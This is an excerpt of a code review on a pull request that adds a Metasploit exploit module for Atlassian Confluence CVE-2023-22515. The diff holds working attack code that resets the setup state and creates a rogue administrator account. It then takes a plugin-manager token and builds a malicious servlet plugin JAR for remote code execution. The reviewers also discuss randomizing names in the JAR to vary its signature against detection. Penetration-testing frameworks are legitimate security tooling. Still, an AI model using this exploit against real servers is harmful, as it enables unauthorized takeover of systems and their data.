modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb

```diff
@@ -0,0 +1,319 @@
+      'method' => 'POST',
+      'uri' => target_endpoint,
+      'vars_post' => {
+        'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'
+      }
+    )
+
+    unless res&.code == 302 || res&.code == 200
+      fail_with(Failure::UnexpectedReply, "Unexpected reply from endpoint: #{target_endpoint}")
+    end
+
+    print_status('Creating a new administrator user account...')
+
+    # usernames must be lowercase
+    admin_username = rand_text_alpha_lower(8)
+    admin_password = rand_text_alphanumeric(8)
+
+    # 2. Create a new administrator user account.
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'setup', 'setupadministrator.action'),
+      'headers' => {
+        'X-Atlassian-Token' => 'no-check'
+      },
+      'vars_post' => {
+        'username' => admin_username,
+        'fullName' => rand_text_alphanumeric(8),
+        # The email address does not need to be a valid address, but it must contain an @ character.
+        'email' => "#{rand_text_alphanumeric(8)}@#{rand_text_alphanumeric(8)}",
+        'password' => admin_password,
+        'confirm' => admin_password,
+        'setup-next-button' => 'Next'
+      }
+    )
+
+    unless res&.code == 302 || res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /setup/setupadministrator.action')
+    end
+
+    print_status("Created #{admin_username}:#{admin_password}")
+
+    # 3. Force the setup to become completed, to allow normal Confluence operations to continue.
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'setup', 'finishsetup.action'),
+      'headers' => {
+        'X-Atlassian-Token' => 'no-check'
+      }
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /setup/finishsetup.action')
+    end
+
+    print_status('Adding a malicious plugin...')
+
+    # 4. Upload a new Confluence Servlet plugin, by first requesting a UPM token.
+    res = send_request_cgi(
+      'method' => 'GET',
+      # Note, we concatenate '/' as this is required by the endpoint.
+      'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') + '/',
+      'headers' => {
+        'Authorization' => basic_auth(admin_username, admin_password),
+        'Accept' => '*/*'
+      },
+      'vars_get' => {
+        'os_authType' => 'basic'
+      }
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /rest/plugins/1.0/')
+    end
+
+    upm_token = res.headers['upm-token']
+    unless upm_token
+      fail_with(Failure::UnexpectedReply, 'No UPM token from endpoint: /rest/plugins/1.0/')
+    end
+
+    begin
+      payload_endpoint = rand_text_alphanumeric(8)
+
+      plugin_key = rand_text_alpha(8)
+
+      # 5. Construct a malicious Servlet plugin JAR file.
+      jar = payload.encoded_jar
```

Comment:
I found an option to randomize the `metasploit` string in the jar. It is certainly not enough to avoid detection, but still interesting, I think:
```suggestion
      jar = payload.encoded_jar(random: true)
```

The jar will look like this:
```
❯ tar tvzf plugin_7247430945392130987_PLUlYx0S.jar
-rw-rw-r--  0 0      0          39 17 Oct 20:23 kpAbvjTHWG.dat
drwxrwxr-x  0 0      0           0 17 Oct 20:23 kpAbvjTHWG/
-rw-rw-r--  0 0      0        8765 17 Oct 20:23 kpAbvjTHWG/Payload.class
drwxrwxr-x  0 0      0           0 17 Oct 20:23 META-INF/
-rw-rw-r--  0 0      0         145 17 Oct 20:23 META-INF/MANIFEST.MF
-rw-rw-r--  0 0      0         308 17 Oct 20:23 atlassian-plugin.xml
-rw-rw-r--  0 0      0         812 17 Oct 20:23 kpAbvjTHWG/PayloadServlet.class
```

I'm wondering if we can also change the class names...

Reply:
Very cool, thanks @cdelafuente-r7 I didn't know we could do this. I don't think we can randomize the class names as we would need to patch the Java bytecode (or recompile framework side) as Java expects the file name to match the class name, also `PayloadServlet` would need to know what name `Payload` has become, so it can call it. This seems like a solvable problem, but I couldn't find an existing way in the framework to do this. 

Radminized the class path via [5e84f57](https://github.com/rapid7/metasploit-framework/pull/18461/commits/5e84f57ab36494f84d1845ba9168d38b064f5765).